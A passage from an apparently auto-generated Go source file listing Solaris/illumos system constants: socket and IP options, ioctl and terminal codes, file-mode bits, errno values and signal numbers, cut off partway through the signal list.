IN_CLASSA_MAX = 0x80
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 0x18
IN_CLASSB_HOST = 0xffff
IN_CLASSB_MAX = 0x10000
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 0x10
IN_CLASSC_HOST = 0xff
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 0x8
IN_CLASSD_HOST = 0xfffffff
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 0x1c
IN_CLASSE_NET = 0xffffffff
IN_LOOPBACKNET = 0x7f
IN_PRIVATE12_MASK = 0xfff00000
IN_PRIVATE12_NET = 0xac100000
IN_PRIVATE16_MASK = 0xffff0000
IN_PRIVATE16_NET = 0xc0a80000
IN_PRIVATE8_MASK = 0xff000000
IN_PRIVATE8_NET = 0xa000000
IPPROTO_AH = 0x33
IPPROTO_DSTOPTS = 0x3c
IPPROTO_EGP = 0x8
IPPROTO_ENCAP = 0x4
IPPROTO_EON = 0x50
IPPROTO_ESP = 0x32
IPPROTO_FRAGMENT = 0x2c
IPPROTO_GGP = 0x3
IPPROTO_HELLO = 0x3f
IPPROTO_HOPOPTS = 0x0
IPPROTO_ICMP = 0x1
IPPROTO_ICMPV6 = 0x3a
IPPROTO_IDP = 0x16
IPPROTO_IGMP = 0x2
IPPROTO_IP = 0x0
IPPROTO_IPV6 = 0x29
IPPROTO_MAX = 0x100
IPPROTO_ND = 0x4d
IPPROTO_NONE = 0x3b
IPPROTO_OSPF = 0x59
IPPROTO_PIM = 0x67
IPPROTO_PUP = 0xc
IPPROTO_RAW = 0xff
IPPROTO_ROUTING = 0x2b
IPPROTO_RSVP = 0x2e
IPPROTO_SCTP = 0x84
IPPROTO_TCP = 0x6
IPPROTO_UDP = 0x11
IPV6_ADD_MEMBERSHIP = 0x9
IPV6_BOUND_IF = 0x41
IPV6_CHECKSUM = 0x18
IPV6_DONTFRAG = 0x21
IPV6_DROP_MEMBERSHIP = 0xa
IPV6_DSTOPTS = 0xf
IPV6_FLOWINFO_FLOWLABEL = 0xffff0f00
IPV6_FLOWINFO_TCLASS = 0xf00f
IPV6_HOPLIMIT = 0xc
IPV6_HOPOPTS = 0xe
IPV6_JOIN_GROUP = 0x9
IPV6_LEAVE_GROUP = 0xa
IPV6_MULTICAST_HOPS = 0x7
IPV6_MULTICAST_IF = 0x6
IPV6_MULTICAST_LOOP = 0x8
IPV6_NEXTHOP = 0xd
IPV6_PAD1_OPT = 0x0
IPV6_PATHMTU = 0x25
IPV6_PKTINFO = 0xb
IPV6_PREFER_SRC_CGA = 0x20
IPV6_PREFER_SRC_CGADEFAULT = 0x10
IPV6_PREFER_SRC_CGAMASK = 0x30
IPV6_PREFER_SRC_COA = 0x2
IPV6_PREFER_SRC_DEFAULT = 0x15
IPV6_PREFER_SRC_HOME = 0x1
IPV6_PREFER_SRC_MASK = 0x3f
IPV6_PREFER_SRC_MIPDEFAULT = 0x1
IPV6_PREFER_SRC_MIPMASK = 0x3
IPV6_PREFER_SRC_NONCGA = 0x10
IPV6_PREFER_SRC_PUBLIC = 0x4
IPV6_PREFER_SRC_TMP = 0x8
IPV6_PREFER_SRC_TMPDEFAULT = 0x4
IPV6_PREFER_SRC_TMPMASK = 0xc
IPV6_RECVDSTOPTS = 0x28
IPV6_RECVHOPLIMIT = 0x13
IPV6_RECVHOPOPTS = 0x14
IPV6_RECVPATHMTU = 0x24
IPV6_RECVPKTINFO = 0x12
IPV6_RECVRTHDR = 0x16
IPV6_RECVRTHDRDSTOPTS = 0x17
IPV6_RECVTCLASS = 0x19
IPV6_RTHDR = 0x10
IPV6_RTHDRDSTOPTS = 0x11
IPV6_RTHDR_TYPE_0 = 0x0
IPV6_SEC_OPT = 0x22
IPV6_SRC_PREFERENCES = 0x23
IPV6_TCLASS = 0x26
IPV6_UNICAST_HOPS = 0x5
IPV6_UNSPEC_SRC = 0x42
IPV6_USE_MIN_MTU = 0x20
IPV6_V6ONLY = 0x27
IP_ADD_MEMBERSHIP = 0x13
IP_ADD_SOURCE_MEMBERSHIP = 0x17
IP_BLOCK_SOURCE = 0x15
IP_BOUND_IF = 0x41
IP_BROADCAST = 0x106
IP_BROADCAST_TTL = 0x43
IP_DEFAULT_MULTICAST_LOOP = 0x1
IP_DEFAULT_MULTICAST_TTL = 0x1
IP_DF = 0x4000
IP_DHCPINIT_IF = 0x45
IP_DONTFRAG = 0x1b
IP_DONTROUTE = 0x105
IP_DROP_MEMBERSHIP = 0x14
IP_DROP_SOURCE_MEMBERSHIP = 0x18
IP_HDRINCL = 0x2
IP_MAXPACKET = 0xffff
IP_MF = 0x2000
IP_MSS = 0x240
IP_MULTICAST_IF = 0x10
IP_MULTICAST_LOOP = 0x12
IP_MULTICAST_TTL = 0x11
IP_NEXTHOP = 0x19
IP_OPTIONS = 0x1
IP_PKTINFO = 0x1a
IP_RECVDSTADDR = 0x7
IP_RECVIF = 0x9
IP_RECVOPTS = 0x5
IP_RECVPKTINFO = 0x1a
IP_RECVRETOPTS = 0x6
IP_RECVSLLA = 0xa
IP_RECVTTL = 0xb
IP_RETOPTS = 0x8
IP_REUSEADDR = 0x104
IP_SEC_OPT = 0x22
IP_TOS = 0x3
IP_TTL = 0x4
IP_UNBLOCK_SOURCE = 0x16
IP_UNSPEC_SRC = 0x42
ISIG = 0x1
ISTRIP = 0x20
IUCLC = 0x200
IXANY = 0x800
IXOFF = 0x1000
IXON = 0x400
LOCK_EX = 0x2
LOCK_NB = 0x4
LOCK_SH = 0x1
LOCK_UN = 0x8
MADV_ACCESS_DEFAULT = 0x6
MADV_ACCESS_LWP = 0x7
MADV_ACCESS_MANY = 0x8
MADV_DONTNEED = 0x4
MADV_FREE = 0x5
MADV_NORMAL = 0x0
MADV_PURGE = 0x9
MADV_RANDOM = 0x1
MADV_SEQUENTIAL = 0x2
MADV_WILLNEED = 0x3
MAP_32BIT = 0x80
MAP_ALIGN = 0x200
MAP_ANON = 0x100
MAP_ANONYMOUS = 0x100
MAP_FILE = 0x0
MAP_FIXED = 0x10
MAP_INITDATA = 0x800
MAP_NORESERVE = 0x40
MAP_PRIVATE = 0x2
MAP_RENAME = 0x20
MAP_SHARED = 0x1
MAP_TEXT = 0x400
MAP_TYPE = 0xf
MCL_CURRENT = 0x1
MCL_FUTURE = 0x2
MSG_CTRUNC = 0x10
MSG_DONTROUTE = 0x4
MSG_DONTWAIT = 0x80
MSG_DUPCTRL = 0x800
MSG_EOR = 0x8
MSG_MAXIOVLEN = 0x10
MSG_NOTIFICATION = 0x100
MSG_OOB = 0x1
MSG_PEEK = 0x2
MSG_TRUNC = 0x20
MSG_WAITALL = 0x40
MSG_XPG4_2 = 0x8000
MS_ASYNC = 0x1
MS_INVALIDATE = 0x2
MS_OLDSYNC = 0x0
MS_SYNC = 0x4
M_FLUSH = 0x86
NAME_MAX = 0xff
NEWDEV = 0x1
NL0 = 0x0
NL1 = 0x100
NLDLY = 0x100
NOFLSH = 0x80
OCRNL = 0x8
OFDEL = 0x80
OFILL = 0x40
OLCUC = 0x2
OLDDEV = 0x0
ONBITSMAJOR = 0x7
ONBITSMINOR = 0x8
ONLCR = 0x4
ONLRET = 0x20
ONOCR = 0x10
OPENFAIL = -0x1
OPOST = 0x1
O_ACCMODE = 0x600003
O_APPEND = 0x8
O_CLOEXEC = 0x800000
O_CREAT = 0x100
O_DSYNC = 0x40
O_EXCL = 0x400
O_EXEC = 0x400000
O_LARGEFILE = 0x2000
O_NDELAY = 0x4
O_NOCTTY = 0x800
O_NOFOLLOW = 0x20000
O_NOLINKS = 0x40000
O_NONBLOCK = 0x80
O_RDONLY = 0x0
O_RDWR = 0x2
O_RSYNC = 0x8000
O_SEARCH = 0x200000
O_SIOCGIFCONF = -0x3ff796ec
O_SIOCGLIFCONF = -0x3fef9688
O_SYNC = 0x10
O_TRUNC = 0x200
O_WRONLY = 0x1
O_XATTR = 0x4000
PARENB = 0x100
PAREXT = 0x100000
PARMRK = 0x8
PARODD = 0x200
PENDIN = 0x4000
PRIO_PGRP = 0x1
PRIO_PROCESS = 0x0
PRIO_USER = 0x2
PROT_EXEC = 0x4
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
RLIMIT_AS = 0x6
RLIMIT_CORE = 0x4
RLIMIT_CPU = 0x0
RLIMIT_DATA = 0x2
RLIMIT_FSIZE = 0x1
RLIMIT_NOFILE = 0x5
RLIMIT_STACK = 0x3
RLIM_INFINITY = -0x3
RTAX_AUTHOR = 0x6
RTAX_BRD = 0x7
RTAX_DST = 0x0
RTAX_GATEWAY = 0x1
RTAX_GENMASK = 0x3
RTAX_IFA = 0x5
RTAX_IFP = 0x4
RTAX_MAX = 0x9
RTAX_NETMASK = 0x2
RTAX_SRC = 0x8
RTA_AUTHOR = 0x40
RTA_BRD = 0x80
RTA_DST = 0x1
RTA_GATEWAY = 0x2
RTA_GENMASK = 0x8
RTA_IFA = 0x20
RTA_IFP = 0x10
RTA_NETMASK = 0x4
RTA_NUMBITS = 0x9
RTA_SRC = 0x100
RTF_BLACKHOLE = 0x1000
RTF_CLONING = 0x100
RTF_DONE = 0x40
RTF_DYNAMIC = 0x10
RTF_GATEWAY = 0x2
RTF_HOST = 0x4
RTF_INDIRECT = 0x40000
RTF_KERNEL = 0x80000
RTF_LLINFO = 0x400
RTF_MASK = 0x80
RTF_MODIFIED = 0x20
RTF_MULTIRT = 0x10000
RTF_PRIVATE = 0x2000
RTF_PROTO1 = 0x8000
RTF_PROTO2 = 0x4000
RTF_REJECT = 0x8
RTF_SETSRC = 0x20000
RTF_STATIC = 0x800
RTF_UP = 0x1
RTF_XRESOLVE = 0x200
RTF_ZONE = 0x100000
RTM_ADD = 0x1
RTM_CHANGE = 0x3
RTM_CHGADDR = 0xf
RTM_DELADDR = 0xd
RTM_DELETE = 0x2
RTM_FREEADDR = 0x10
RTM_GET = 0x4
RTM_IFINFO = 0xe
RTM_LOCK = 0x8
RTM_LOSING = 0x5
RTM_MISS = 0x7
RTM_NEWADDR = 0xc
RTM_OLDADD = 0x9
RTM_OLDDEL = 0xa
RTM_REDIRECT = 0x6
RTM_RESOLVE = 0xb
RTM_VERSION = 0x3
RTV_EXPIRE = 0x4
RTV_HOPCOUNT = 0x2
RTV_MTU = 0x1
RTV_RPIPE = 0x8
RTV_RTT = 0x40
RTV_RTTVAR = 0x80
RTV_SPIPE = 0x10
RTV_SSTHRESH = 0x20
RT_AWARE = 0x1
RUSAGE_CHILDREN = -0x1
RUSAGE_SELF = 0x0
SCM_RIGHTS = 0x1010
SCM_TIMESTAMP = 0x1013
SCM_UCRED = 0x1012
SHUT_RD = 0x0
SHUT_RDWR = 0x2
SHUT_WR = 0x1
SIG2STR_MAX = 0x20
SIOCADDMULTI = -0x7fdf96cf
SIOCADDRT = -0x7fcf8df6
SIOCATMARK = 0x40047307
SIOCDARP = -0x7fdb96e0
SIOCDELMULTI = -0x7fdf96ce
SIOCDELRT = -0x7fcf8df5
SIOCDXARP = -0x7fff9658
SIOCGARP = -0x3fdb96e1
SIOCGDSTINFO = -0x3fff965c
SIOCGENADDR = -0x3fdf96ab
SIOCGENPSTATS = -0x3fdf96c7
SIOCGETLSGCNT = -0x3fef8deb
SIOCGETNAME = 0x40107334
SIOCGETPEER = 0x40107335
SIOCGETPROP = -0x3fff8f44
SIOCGETSGCNT = -0x3feb8deb
SIOCGETSYNC = -0x3fdf96d3
SIOCGETVIFCNT = -0x3feb8dec
SIOCGHIWAT = 0x40047301
SIOCGIFADDR = -0x3fdf96f3
SIOCGIFBRDADDR = -0x3fdf96e9
SIOCGIFCONF = -0x3ff796a4
SIOCGIFDSTADDR = -0x3fdf96f1
SIOCGIFFLAGS = -0x3fdf96ef
SIOCGIFHWADDR = -0x3fdf9647
SIOCGIFINDEX = -0x3fdf96a6
SIOCGIFMEM = -0x3fdf96ed
SIOCGIFMETRIC = -0x3fdf96e5
SIOCGIFMTU = -0x3fdf96ea
SIOCGIFMUXID = -0x3fdf96a8
SIOCGIFNETMASK = -0x3fdf96e7
SIOCGIFNUM = 0x40046957
SIOCGIP6ADDRPOLICY = -0x3fff965e
SIOCGIPMSFILTER = -0x3ffb964c
SIOCGLIFADDR = -0x3f87968f
SIOCGLIFBINDING = -0x3f879666
SIOCGLIFBRDADDR = -0x3f879685
SIOCGLIFCONF = -0x3fef965b
SIOCGLIFDADSTATE = -0x3f879642
SIOCGLIFDSTADDR = -0x3f87968d
SIOCGLIFFLAGS = -0x3f87968b
SIOCGLIFGROUPINFO = -0x3f4b9663
SIOCGLIFGROUPNAME = -0x3f879664
SIOCGLIFHWADDR = -0x3f879640
SIOCGLIFINDEX = -0x3f87967b
SIOCGLIFLNKINFO = -0x3f879674
SIOCGLIFMETRIC = -0x3f879681
SIOCGLIFMTU = -0x3f879686
SIOCGLIFMUXID = -0x3f87967d
SIOCGLIFNETMASK = -0x3f879683
SIOCGLIFNUM = -0x3ff3967e
SIOCGLIFSRCOF = -0x3fef964f
SIOCGLIFSUBNET = -0x3f879676
SIOCGLIFTOKEN = -0x3f879678
SIOCGLIFUSESRC = -0x3f879651
SIOCGLIFZONE = -0x3f879656
SIOCGLOWAT = 0x40047303
SIOCGMSFILTER = -0x3ffb964e
SIOCGPGRP = 0x40047309
SIOCGSTAMP = -0x3fef9646
SIOCGXARP = -0x3fff9659
SIOCIFDETACH = -0x7fdf96c8
SIOCILB = -0x3ffb9645
SIOCLIFADDIF = -0x3f879691
SIOCLIFDELND = -0x7f879673
SIOCLIFGETND = -0x3f879672
SIOCLIFREMOVEIF = -0x7f879692
SIOCLIFSETND = -0x7f879671
SIOCLOWER = -0x7fdf96d7
SIOCSARP = -0x7fdb96e2
SIOCSCTPGOPT = -0x3fef9653
SIOCSCTPPEELOFF = -0x3ffb9652
SIOCSCTPSOPT = -0x7fef9654
SIOCSENABLESDP = -0x3ffb9649
SIOCSETPROP = -0x7ffb8f43
SIOCSETSYNC = -0x7fdf96d4
SIOCSHIWAT = -0x7ffb8d00
SIOCSIFADDR = -0x7fdf96f4
SIOCSIFBRDADDR = -0x7fdf96e8
SIOCSIFDSTADDR = -0x7fdf96f2
SIOCSIFFLAGS = -0x7fdf96f0
SIOCSIFINDEX = -0x7fdf96a5
SIOCSIFMEM = -0x7fdf96ee
SIOCSIFMETRIC = -0x7fdf96e4
SIOCSIFMTU = -0x7fdf96eb
SIOCSIFMUXID = -0x7fdf96a7
SIOCSIFNAME = -0x7fdf96b7
SIOCSIFNETMASK = -0x7fdf96e6
SIOCSIP6ADDRPOLICY = -0x7fff965d
SIOCSIPMSFILTER = -0x7ffb964b
SIOCSLGETREQ = -0x3fdf96b9
SIOCSLIFADDR = -0x7f879690
SIOCSLIFBRDADDR = -0x7f879684
SIOCSLIFDSTADDR = -0x7f87968e
SIOCSLIFFLAGS = -0x7f87968c
SIOCSLIFGROUPNAME = -0x7f879665
SIOCSLIFINDEX = -0x7f87967a
SIOCSLIFLNKINFO = -0x7f879675
SIOCSLIFMETRIC = -0x7f879680
SIOCSLIFMTU = -0x7f879687
SIOCSLIFMUXID = -0x7f87967c
SIOCSLIFNAME = -0x3f87967f
SIOCSLIFNETMASK = -0x7f879682
SIOCSLIFPREFIX = -0x3f879641
SIOCSLIFSUBNET = -0x7f879677
SIOCSLIFTOKEN = -0x7f879679
SIOCSLIFUSESRC = -0x7f879650
SIOCSLIFZONE = -0x7f879655
SIOCSLOWAT = -0x7ffb8cfe
SIOCSLSTAT = -0x7fdf96b8
SIOCSMSFILTER = -0x7ffb964d
SIOCSPGRP = -0x7ffb8cf8
SIOCSPROMISC = -0x7ffb96d0
SIOCSQPTR = -0x3ffb9648
SIOCSSDSTATS = -0x3fdf96d2
SIOCSSESTATS = -0x3fdf96d1
SIOCSXARP = -0x7fff965a
SIOCTMYADDR = -0x3ff79670
SIOCTMYSITE = -0x3ff7966e
SIOCTONLINK = -0x3ff7966f
SIOCUPPER = -0x7fdf96d8
SIOCX25RCV = -0x3fdf96c4
SIOCX25TBL = -0x3fdf96c3
SIOCX25XMT = -0x3fdf96c5
SIOCXPROTO = 0x20007337
SOCK_CLOEXEC = 0x80000
SOCK_DGRAM = 0x1
SOCK_NDELAY = 0x200000
SOCK_NONBLOCK = 0x100000
SOCK_RAW = 0x4
SOCK_RDM = 0x5
SOCK_SEQPACKET = 0x6
SOCK_STREAM = 0x2
SOCK_TYPE_MASK = 0xffff
SOL_FILTER = 0xfffc
SOL_PACKET = 0xfffd
SOL_ROUTE = 0xfffe
SOL_SOCKET = 0xffff
SOMAXCONN = 0x80
SO_ACCEPTCONN = 0x2
SO_ALL = 0x3f
SO_ALLZONES = 0x1014
SO_ANON_MLP = 0x100a
SO_ATTACH_FILTER = 0x40000001
SO_BAND = 0x4000
SO_BROADCAST = 0x20
SO_COPYOPT = 0x80000
SO_DEBUG = 0x1
SO_DELIM = 0x8000
SO_DETACH_FILTER = 0x40000002
SO_DGRAM_ERRIND = 0x200
SO_DOMAIN = 0x100c
SO_DONTLINGER = -0x81
SO_DONTROUTE = 0x10
SO_ERROPT = 0x40000
SO_ERROR = 0x1007
SO_EXCLBIND = 0x1015
SO_HIWAT = 0x10
SO_ISNTTY = 0x800
SO_ISTTY = 0x400
SO_KEEPALIVE = 0x8
SO_LINGER = 0x80
SO_LOWAT = 0x20
SO_MAC_EXEMPT = 0x100b
SO_MAC_IMPLICIT = 0x1016
SO_MAXBLK = 0x100000
SO_MAXPSZ = 0x8
SO_MINPSZ = 0x4
SO_MREADOFF = 0x80
SO_MREADON = 0x40
SO_NDELOFF = 0x200
SO_NDELON = 0x100
SO_NODELIM = 0x10000
SO_OOBINLINE = 0x100
SO_PROTOTYPE = 0x1009
SO_RCVBUF = 0x1002
SO_RCVLOWAT = 0x1004
SO_RCVPSH = 0x100d
SO_RCVTIMEO = 0x1006
SO_READOPT = 0x1
SO_RECVUCRED = 0x400
SO_REUSEADDR = 0x4
SO_SECATTR = 0x1011
SO_SNDBUF = 0x1001
SO_SNDLOWAT = 0x1003
SO_SNDTIMEO = 0x1005
SO_STRHOLD = 0x20000
SO_TAIL = 0x200000
SO_TIMESTAMP = 0x1013
SO_TONSTOP = 0x2000
SO_TOSTOP = 0x1000
SO_TYPE = 0x1008
SO_USELOOPBACK = 0x40
SO_VRRP = 0x1017
SO_WROFF = 0x2
S_ENFMT = 0x400
S_IAMB = 0x1ff
S_IEXEC = 0x40
S_IFBLK = 0x6000
S_IFCHR = 0x2000
S_IFDIR = 0x4000
S_IFDOOR = 0xd000
S_IFIFO = 0x1000
S_IFLNK = 0xa000
S_IFMT = 0xf000
S_IFNAM = 0x5000
S_IFPORT = 0xe000
S_IFREG = 0x8000
S_IFSOCK = 0xc000
S_INSEM = 0x1
S_INSHD = 0x2
S_IREAD = 0x100
S_IRGRP = 0x20
S_IROTH = 0x4
S_IRUSR = 0x100
S_IRWXG = 0x38
S_IRWXO = 0x7
S_IRWXU = 0x1c0
S_ISGID = 0x400
S_ISUID = 0x800
S_ISVTX = 0x200
S_IWGRP = 0x10
S_IWOTH = 0x2
S_IWRITE = 0x80
S_IWUSR = 0x80
S_IXGRP = 0x8
S_IXOTH = 0x1
S_IXUSR = 0x40
TAB0 = 0x0
TAB1 = 0x800
TAB2 = 0x1000
TAB3 = 0x1800
TABDLY = 0x1800
TCFLSH = 0x5407
TCGETA = 0x5401
TCGETS = 0x540d
TCIFLUSH = 0x0
TCIOFF = 0x2
TCIOFLUSH = 0x2
TCION = 0x3
TCOFLUSH = 0x1
TCOOFF = 0x0
TCOON = 0x1
TCP_ABORT_THRESHOLD = 0x11
TCP_ANONPRIVBIND = 0x20
TCP_CONN_ABORT_THRESHOLD = 0x13
TCP_CONN_NOTIFY_THRESHOLD = 0x12
TCP_CORK = 0x18
TCP_EXCLBIND = 0x21
TCP_INIT_CWND = 0x15
TCP_KEEPALIVE = 0x8
TCP_KEEPALIVE_ABORT_THRESHOLD = 0x17
TCP_KEEPALIVE_THRESHOLD = 0x16
TCP_KEEPCNT = 0x23
TCP_KEEPIDLE = 0x22
TCP_KEEPINTVL = 0x24
TCP_LINGER2 = 0x1c
TCP_MAXSEG = 0x2
TCP_MSS = 0x218
TCP_NODELAY = 0x1
TCP_NOTIFY_THRESHOLD = 0x10
TCP_RECVDSTADDR = 0x14
TCP_RTO_INITIAL = 0x19
TCP_RTO_MAX = 0x1b
TCP_RTO_MIN = 0x1a
TCSAFLUSH = 0x5410
TCSBRK = 0x5405
TCSETA = 0x5402
TCSETAF = 0x5404
TCSETAW = 0x5403
TCSETS = 0x540e
TCSETSF = 0x5410
TCSETSW = 0x540f
TCXONC = 0x5406
TIOC = 0x5400
TIOCCBRK = 0x747a
TIOCCDTR = 0x7478
TIOCCILOOP = 0x746c
TIOCEXCL = 0x740d
TIOCFLUSH = 0x7410
TIOCGETC = 0x7412
TIOCGETD = 0x7400
TIOCGETP = 0x7408
TIOCGLTC = 0x7474
TIOCGPGRP = 0x7414
TIOCGPPS = 0x547d
TIOCGPPSEV = 0x547f
TIOCGSID = 0x7416
TIOCGSOFTCAR = 0x5469
TIOCGWINSZ = 0x5468
TIOCHPCL = 0x7402
TIOCKBOF = 0x5409
TIOCKBON = 0x5408
TIOCLBIC = 0x747e
TIOCLBIS = 0x747f
TIOCLGET = 0x747c
TIOCLSET = 0x747d
TIOCMBIC = 0x741c
TIOCMBIS = 0x741b
TIOCMGET = 0x741d
TIOCMSET = 0x741a
TIOCM_CAR = 0x40
TIOCM_CD = 0x40
TIOCM_CTS = 0x20
TIOCM_DSR = 0x100
TIOCM_DTR = 0x2
TIOCM_LE = 0x1
TIOCM_RI = 0x80
TIOCM_RNG = 0x80
TIOCM_RTS = 0x4
TIOCM_SR = 0x10
TIOCM_ST = 0x8
TIOCNOTTY = 0x7471
TIOCNXCL = 0x740e
TIOCOUTQ = 0x7473
TIOCREMOTE = 0x741e
TIOCSBRK = 0x747b
TIOCSCTTY = 0x7484
TIOCSDTR = 0x7479
TIOCSETC = 0x7411
TIOCSETD = 0x7401
TIOCSETN = 0x740a
TIOCSETP = 0x7409
TIOCSIGNAL = 0x741f
TIOCSILOOP = 0x746d
TIOCSLTC = 0x7475
TIOCSPGRP = 0x7415
TIOCSPPS = 0x547e
TIOCSSOFTCAR = 0x546a
TIOCSTART = 0x746e
TIOCSTI = 0x7417
TIOCSTOP = 0x746f
TIOCSWINSZ = 0x5467
TOSTOP = 0x100
UTIME_NOW = -0x1
UTIME_OMIT = -0x2
VCEOF = 0x8
VCEOL = 0x9
VDISCARD = 0xd
VDSUSP = 0xb
VEOF = 0x4
VEOL = 0x5
VEOL2 = 0x6
VERASE = 0x2
VERASE2 = 0x11
VINTR = 0x0
VKILL = 0x3
VLNEXT = 0xf
VMIN = 0x4
VQUIT = 0x1
VREPRINT = 0xc
VSTART = 0x8
VSTATUS = 0x10
VSTOP = 0x9
VSUSP = 0xa
VSWTCH = 0x7
VT0 = 0x0
VT1 = 0x4000
VTDLY = 0x4000
VTIME = 0x5
VWERASE = 0xe
WCONTFLG = 0xffff
WCONTINUED = 0x8
WCOREFLG = 0x80
WEXITED = 0x1
WNOHANG = 0x40
WNOWAIT = 0x80
WOPTMASK = 0xcf
WRAP = 0x20000
WSIGMASK = 0x7f
WSTOPFLG = 0x7f
WSTOPPED = 0x4
WTRAPPED = 0x2
WUNTRACED = 0x4
XCASE = 0x4
XTABS = 0x1800
)
// Errors
const (
E2BIG = syscall.Errno(0x7)
EACCES = syscall.Errno(0xd)
EADDRINUSE = syscall.Errno(0x7d)
EADDRNOTAVAIL = syscall.Errno(0x7e)
EADV = syscall.Errno(0x44)
EAFNOSUPPORT = syscall.Errno(0x7c)
EAGAIN = syscall.Errno(0xb)
EALREADY = syscall.Errno(0x95)
EBADE = syscall.Errno(0x32)
EBADF = syscall.Errno(0x9)
EBADFD = syscall.Errno(0x51)
EBADMSG = syscall.Errno(0x4d)
EBADR = syscall.Errno(0x33)
EBADRQC = syscall.Errno(0x36)
EBADSLT = syscall.Errno(0x37)
EBFONT = syscall.Errno(0x39)
EBUSY = syscall.Errno(0x10)
ECANCELED = syscall.Errno(0x2f)
ECHILD = syscall.Errno(0xa)
ECHRNG = syscall.Errno(0x25)
ECOMM = syscall.Errno(0x46)
ECONNABORTED = syscall.Errno(0x82)
ECONNREFUSED = syscall.Errno(0x92)
ECONNRESET = syscall.Errno(0x83)
EDEADLK = syscall.Errno(0x2d)
EDEADLOCK = syscall.Errno(0x38)
EDESTADDRREQ = syscall.Errno(0x60)
EDOM = syscall.Errno(0x21)
EDQUOT = syscall.Errno(0x31)
EEXIST = syscall.Errno(0x11)
EFAULT = syscall.Errno(0xe)
EFBIG = syscall.Errno(0x1b)
EHOSTDOWN = syscall.Errno(0x93)
EHOSTUNREACH = syscall.Errno(0x94)
EIDRM = syscall.Errno(0x24)
EILSEQ = syscall.Errno(0x58)
EINPROGRESS = syscall.Errno(0x96)
EINTR = syscall.Errno(0x4)
EINVAL = syscall.Errno(0x16)
EIO = syscall.Errno(0x5)
EISCONN = syscall.Errno(0x85)
EISDIR = syscall.Errno(0x15)
EL2HLT = syscall.Errno(0x2c)
EL2NSYNC = syscall.Errno(0x26)
EL3HLT = syscall.Errno(0x27)
EL3RST = syscall.Errno(0x28)
ELIBACC = syscall.Errno(0x53)
ELIBBAD = syscall.Errno(0x54)
ELIBEXEC = syscall.Errno(0x57)
ELIBMAX = syscall.Errno(0x56)
ELIBSCN = syscall.Errno(0x55)
ELNRNG = syscall.Errno(0x29)
ELOCKUNMAPPED = syscall.Errno(0x48)
ELOOP = syscall.Errno(0x5a)
EMFILE = syscall.Errno(0x18)
EMLINK = syscall.Errno(0x1f)
EMSGSIZE = syscall.Errno(0x61)
EMULTIHOP = syscall.Errno(0x4a)
ENAMETOOLONG = syscall.Errno(0x4e)
ENETDOWN = syscall.Errno(0x7f)
ENETRESET = syscall.Errno(0x81)
ENETUNREACH = syscall.Errno(0x80)
ENFILE = syscall.Errno(0x17)
ENOANO = syscall.Errno(0x35)
ENOBUFS = syscall.Errno(0x84)
ENOCSI = syscall.Errno(0x2b)
ENODATA = syscall.Errno(0x3d)
ENODEV = syscall.Errno(0x13)
ENOENT = syscall.Errno(0x2)
ENOEXEC = syscall.Errno(0x8)
ENOLCK = syscall.Errno(0x2e)
ENOLINK = syscall.Errno(0x43)
ENOMEM = syscall.Errno(0xc)
ENOMSG = syscall.Errno(0x23)
ENONET = syscall.Errno(0x40)
ENOPKG = syscall.Errno(0x41)
ENOPROTOOPT = syscall.Errno(0x63)
ENOSPC = syscall.Errno(0x1c)
ENOSR = syscall.Errno(0x3f)
ENOSTR = syscall.Errno(0x3c)
ENOSYS = syscall.Errno(0x59)
ENOTACTIVE = syscall.Errno(0x49)
ENOTBLK = syscall.Errno(0xf)
ENOTCONN = syscall.Errno(0x86)
ENOTDIR = syscall.Errno(0x14)
ENOTEMPTY = syscall.Errno(0x5d)
ENOTRECOVERABLE = syscall.Errno(0x3b)
ENOTSOCK = syscall.Errno(0x5f)
ENOTSUP = syscall.Errno(0x30)
ENOTTY = syscall.Errno(0x19)
ENOTUNIQ = syscall.Errno(0x50)
ENXIO = syscall.Errno(0x6)
EOPNOTSUPP = syscall.Errno(0x7a)
EOVERFLOW = syscall.Errno(0x4f)
EOWNERDEAD = syscall.Errno(0x3a)
EPERM = syscall.Errno(0x1)
EPFNOSUPPORT = syscall.Errno(0x7b)
EPIPE = syscall.Errno(0x20)
EPROTO = syscall.Errno(0x47)
EPROTONOSUPPORT = syscall.Errno(0x78)
EPROTOTYPE = syscall.Errno(0x62)
ERANGE = syscall.Errno(0x22)
EREMCHG = syscall.Errno(0x52)
EREMOTE = syscall.Errno(0x42)
ERESTART = syscall.Errno(0x5b)
EROFS = syscall.Errno(0x1e)
ESHUTDOWN = syscall.Errno(0x8f)
ESOCKTNOSUPPORT = syscall.Errno(0x79)
ESPIPE = syscall.Errno(0x1d)
ESRCH = syscall.Errno(0x3)
ESRMNT = syscall.Errno(0x45)
ESTALE = syscall.Errno(0x97)
ESTRPIPE = syscall.Errno(0x5c)
ETIME = syscall.Errno(0x3e)
ETIMEDOUT = syscall.Errno(0x91)
ETOOMANYREFS = syscall.Errno(0x90)
ETXTBSY = syscall.Errno(0x1a)
EUNATCH = syscall.Errno(0x2a)
EUSERS = syscall.Errno(0x5e)
EWOULDBLOCK = syscall.Errno(0xb)
EXDEV = syscall.Errno(0x12)
EXFULL = syscall.Errno(0x34)
)
// Signals
const (
SIGABRT = syscall.Signal(0x6)
SIGALRM = syscall.Signal(0xe)
SIGBUS = syscall.Signal(0xa)
SIGCANCEL = syscall.Signal(0x24)
SIGCHLD = syscall.Signal(0x12)
SIGCLD = syscall.Signal(0x12)
SIGCONT = syscall.Signal(0x19)
SIGEMT = syscall.Signal(0x7)
SIGFPE = syscall.Signal(0x8)
SIGFREEZE = syscall.Signal(0x22)
SIGHUP = syscall.Signal(0x1)
SIGILL = syscall.Signal(0x4)
SIGINFO = syscall.Signal(0x29)
SIGINT = syscall.Signal(0x2)
SIGIO = syscall.Signal(0x16)
SIGIOT = syscall.Signal(0x6)
SIGJVM1 = syscall.Signal(0x27)
SIGJVM2 = syscall.Signal(0x28)
SIGKILL = syscall.Signal(0x9)
SIGLOST = syscall.Signal(0x25)
SIGLWP = syscall.Signal(0x21)
SIGPIPE = syscall.Signal(0xd)
SIGPOLL = syscall.Signal(0x16)
SIGPROF = syscall.Signal(0x1d)
SIGPWR = syscall.Signal(0x13)
SIGQUIT = syscall.Signal(0x3)
SIGSEGV = syscall.Signal(0xb)
SIGSTOP = syscall.Signal(0x17)
SIGSYS = syscall.Signal(0xc)
